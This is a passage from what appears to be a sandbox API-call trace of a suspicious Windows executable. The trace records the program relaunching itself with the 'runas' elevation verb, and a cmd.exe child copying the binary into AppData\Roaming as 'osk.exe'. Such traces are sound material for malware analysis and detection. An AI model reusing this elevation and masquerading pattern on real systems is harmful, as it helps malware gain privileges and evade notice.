(hMem=0x27000c) returned 0x5e7988 [0057.704] GlobalLock (hMem=0x270004) returned 0x5cf090 [0057.704] GlobalHandle (pMem=0x5e7988) returned 0x27000c [0057.704] GlobalUnlock (hMem=0x27000c) returned 0 [0057.704] GlobalHandle (pMem=0x5cf090) returned 0x270004 [0057.704] GlobalUnlock (hMem=0x270004) returned 0 [0057.704] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5896f0, cbMultiByte=5, lpWideCharStr=0x18edf4, cchWideChar=2047 | out: lpWideCharStr="runasxe[矆\x04") returned 5 [0057.704] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fbe8, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0057.704] GlobalLock (hMem=0x270004) returned 0x5e7988 [0057.704] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0057.704] GlobalUnlock (hMem=0x270004) returned 0 [0057.704] GlobalLock (hMem=0x270004) returned 0x5e7988 [0057.704] GlobalLock (hMem=0x27000c) returned 0x5cf090 [0057.704] GlobalHandle (pMem=0x5e7988) returned 0x270004 [0057.704] GlobalUnlock (hMem=0x270004) returned 0 [0057.706] GlobalHandle (pMem=0x5cf090) returned 0x27000c [0057.706] GlobalUnlock (hMem=0x27000c) returned 0 [0057.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x589768, cbMultiByte=5, lpWideCharStr=0x18edbc, cchWideChar=2047 | out: lpWideCharStr="runas\x18\n") returned 5 [0057.706] ShellExecuteW (hwnd=0x0, lpOperation="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", lpParameters="runas", lpDirectory=0x0, nShowCmd=1) returned 0x2a [0057.799] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x568 Thread: id = 3 os_tid = 0x6f4 Thread: id = 5 os_tid = 0x114 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4817c000" os_pid = "0x534" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = 
"0x4e4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x70c [0057.591] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb2c | out: lpSystemTimeAsFileTime=0x26fb2c*(dwLowDateTime=0xed1a5240, dwHighDateTime=0x1d61645)) [0057.592] GetCurrentProcessId () returned 0x534 [0057.592] GetCurrentThreadId () returned 0x70c [0057.592] GetTickCount () returned 0x114735c [0057.592] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb24 | out: lpPerformanceCount=0x26fb24*=17794632790) returned 1 [0057.593] GetModuleHandleA (lpModuleName=0x0) returned 0x4abc0000 [0057.593] __set_app_type (_Type=0x1) [0057.593] __p__fmode () returned 0x770331f4 [0057.594] __p__commode () returned 0x770331fc [0057.594] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4abe21a6) returned 0x0 [0057.595] __getmainargs (in: _Argc=0x4abe4238, _Argv=0x4abe4240, _Env=0x4abe423c, _DoWildCard=0, _StartInfo=0x4abe4140 | out: _Argc=0x4abe4238, _Argv=0x4abe4240, _Env=0x4abe423c) returned 0 [0057.595] GetCurrentThreadId () returned 0x70c [0057.595] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x70c) returned 0x60 [0057.595] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.595] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0057.595] SetThreadUILanguage (LangId=0x0) returned 0x409 
[0057.596] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.596] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fabc | out: phkResult=0x26fabc*=0x0) returned 0x2 [0057.596] VirtualQuery (in: lpAddress=0x26faf3, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.596] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa8c, dwLength=0x1c | out: lpBuffer=0x26fa8c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0057.596] GetConsoleOutputCP () returned 0x1b5 [0057.596] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abe4260 | out: lpCPInfo=0x4abe4260) returned 1 [0057.597] SetConsoleCtrlHandler (HandlerRoutine=0x4abde72a, Add=1) returned 1 [0057.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.597] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0057.597] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0057.597] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4abe41ac | out: lpMode=0x4abe41ac) returned 1 [0057.597] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.597] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.597] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.597] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4abe41b0 | out: lpMode=0x4abe41b0) returned 1 [0057.599] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.599] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0057.599] GetEnvironmentStringsW () returned 0x362168* [0057.599] GetProcessHeap () returned 0x350000 [0057.599] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x362c40 [0057.599] FreeEnvironmentStringsW (penv=0x362168) returned 1 [0057.599] GetProcessHeap () returned 0x350000 [0057.599] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4) returned 0x361850 [0057.600] GetEnvironmentStringsW () returned 0x362168* [0057.600] GetProcessHeap () returned 0x350000 [0057.600] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x363718 [0057.600] FreeEnvironmentStringsW (penv=0x362168) returned 1 [0057.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea2c | out: phkResult=0x26ea2c*=0x68) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x0, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, 
lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x0, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.600] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.600] RegCloseKey (hKey=0x68) returned 0x0 [0057.600] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea2c | out: phkResult=0x26ea2c*=0x68) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x40, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, 
lpData=0x26ea38*=0x1, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x0, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x9, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x4, lpData=0x26ea38*=0x9, lpcbData=0x26ea30*=0x4) returned 0x0 [0057.601] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea34, lpData=0x26ea38, lpcbData=0x26ea30*=0x1000 | out: lpType=0x26ea34*=0x0, lpData=0x26ea38*=0x9, lpcbData=0x26ea30*=0x1000) returned 0x2 [0057.601] RegCloseKey (hKey=0x68) returned 0x0 [0057.601] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c0 [0057.601] srand (_Seed=0x5e9c43c0) [0057.601] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0057.601] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0057.602] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abe5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.602] GetProcessHeap () returned 0x350000 [0057.602] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x362168 [0057.602] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x362170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: 
"c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0057.603] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.603] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.603] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.603] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0057.603] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0057.604] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0057.604] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0057.604] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0057.604] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0057.604] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0057.604] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.604] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0057.604] GetProcessHeap () returned 0x350000 [0057.604] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x362c40 | out: hHeap=0x350000) returned 1 [0057.604] GetEnvironmentStringsW () returned 0x362380* [0057.604] GetProcessHeap () returned 0x350000 [0057.604] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xae2) returned 0x364ce0 [0057.604] FreeEnvironmentStringsW (penv=0x362380) returned 1 [0057.604] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.604] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4abf0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.604] _wcsicmp (_String1="KEYS", _String2="CD") returned 
8 [0057.604] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0057.604] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0057.604] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0057.604] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0057.604] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0057.604] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0057.604] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0057.604] GetProcessHeap () returned 0x350000 [0057.604] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x30) returned 0x361fe8 [0057.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f7f8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x26f7f8, lpFilePart=0x26f7f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f7f4*="system32") returned 0x13 [0057.605] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0057.605] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x26f574 | out: lpFindFileData=0x26f574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x3657d0 [0057.605] FindClose (in: hFindFile=0x3657d0 | out: hFindFile=0x3657d0) returned 1 [0057.605] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x26f574 | out: lpFindFileData=0x26f574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, 
ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x350ff0 [0057.605] FindClose (in: hFindFile=0x350ff0 | out: hFindFile=0x350ff0) returned 1 [0057.605] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0057.605] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0057.605] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0057.605] GetProcessHeap () returned 0x350000 [0057.605] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364ce0 | out: hHeap=0x350000) returned 1 [0057.605] GetEnvironmentStringsW () returned 0x3641f0* [0057.605] GetProcessHeap () returned 0x350000 [0057.605] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb12) returned 0x364d10 [0057.606] FreeEnvironmentStringsW (penv=0x3641f0) returned 1 [0057.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abe5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x361fe8 | out: hHeap=0x350000) returned 1 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400e) returned 0x365830 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xf2) returned 0x350ff0 [0057.606] GetProcessHeap () returned 0x350000 [0057.606] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365830 | out: hHeap=0x350000) returned 1 [0057.606] GetConsoleOutputCP () returned 0x1b5 [0057.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abe4260 | out: lpCPInfo=0x4abe4260) returned 1 [0057.606] GetUserDefaultLCID () returned 0x409 [0057.607] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4abe4950, cchData=8 | out: lpLCData=":") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f938, cchData=128 | out: lpLCData="0") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f938, cchData=128 | out: lpLCData="0") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f938, cchData=128 | out: lpLCData="1") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4abe4940, cchData=8 | out: lpLCData="/") returned 2 [0057.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4abe4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4abe4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4abe4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4abe4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4abe4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4abe4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4abe4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4abe4930, cchData=8 | out: lpLCData=".") returned 2 [0057.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4abe4920, cchData=8 | out: lpLCData=",") returned 2 [0057.608] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0057.609] GetProcessHeap () returned 0x350000 [0057.609] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x20c) returned 0x362ea0 [0057.609] GetConsoleTitleW (in: lpConsoleTitle=0x362ea0, nSize=0x104 | 
out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.609] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.610] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0057.610] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0057.610] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0057.611] GetProcessHeap () returned 0x350000 [0057.611] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x365830 [0057.611] GetProcessHeap () returned 0x350000 [0057.611] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365830 | out: hHeap=0x350000) returned 1 [0057.611] _wcsicmp (_String1="copy", _String2=")") returned 58 [0057.612] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0057.612] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0057.612] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0057.612] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0057.612] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0057.612] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0057.612] GetProcessHeap () returned 0x350000 [0057.612] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x58) returned 0x3510f0 [0057.612] GetProcessHeap () returned 0x350000 [0057.612] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x12) returned 0x351150 [0057.615] GetProcessHeap () returned 0x350000 [0057.615] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe6) returned 0x351170 [0057.615] GetConsoleTitleW (in: lpConsoleTitle=0x26f630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.616] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0057.616] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0057.616] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0057.616] _wcsicmp (_String1="copy", _String2="TYPE") 
returned -17 [0057.616] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0057.616] GetProcessHeap () returned 0x350000 [0057.616] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x1c4) returned 0x3630b8 [0057.617] GetProcessHeap () returned 0x350000 [0057.617] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3630b8, Size=0xe8) returned 0x3630b8 [0057.617] GetProcessHeap () returned 0x350000 [0057.617] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3630b8) returned 0xe8 [0057.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xf0) returned 0x3631a8 [0057.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abe5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x351260 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x3632a0 [0057.620] GetProcessHeap () returned 0x350000 [0057.620] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x18) returned 0x351298 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0057.621] _wcsnicmp (_String1="COPYCMD", 
_String2="FP_NO_H", _MaxCount=0x7) returned -3 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", 